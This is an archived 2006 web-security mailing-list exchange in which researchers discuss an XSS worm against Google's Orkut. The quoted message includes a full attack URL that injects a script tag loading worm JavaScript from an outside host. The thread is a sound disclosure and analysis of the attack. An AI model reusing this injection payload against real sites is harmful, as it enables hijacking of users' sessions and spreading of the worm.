[WEB SECURITY] XSS worm attacking Google?

pdp (architect) pdp.gnucitizen at googlemail.com
Sat Dec 9 19:45:53 EST 2006


Nice find. It seams that it is written by someone who speaks Spanish.
There was a discussion on sla.ckers.org about a vulnerability in orkut
I think... or was that somewhere else. Anyway, it is funny that
attackers came with this worm so quick since that is only a two week
old finding. It seams that bad guys start realising the power of XSS
worms and their destructive potential. This is not a good news!

On 12/9/06, Billy Hoffman <Billy.Hoffman at spidynamics.com> wrote:
> Folks,
>
> I was running through some proxy logs, and saw a reference to
> http://sb.google.com/safebrowsing/update
>
> Requesting redirected me to a blacklist of what look like phishing
> sites. However, all the way at the bottom was a reference to Google's
> Orkut site. Specficially the blacklist entry was for a GET-based XSS
> attack against Google's GLogin system.
>
> https://www.orkut.com/GLogin.aspx?done=http://www.orkut.com/Scrapbook.as
> px?na=\";};//--></script><script%20src=\'http://www.probranco.net/xmen.j
> s\'></script><!--
>
> If you request that URL, you get a 403 error page saying your query is
> from an automated attack. Looks very similar to a page Google returned
> during the Perl.Santy attack a year or so back.
>
> The JavaScript source code to the attack is still available at
> http://www.probranco.net/xmen.js
>
> Enjoy,
> Billy Hoffman
> --
> Lead Researcher, SPI Labs
> SPI Dynamics Inc. - http://www.spidynamics.com
> Phone:  678-781-4800
> Direct: 678-781-4845
>
>
> ----------------------------------------------------------------------------
> The Web Security Mailing List:
> http://www.webappsec.org/lists/websecurity/
>
> The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
>


-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org

----------------------------------------------------------------------------
The Web Security Mailing List: 
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]



More information about the websecurity mailing list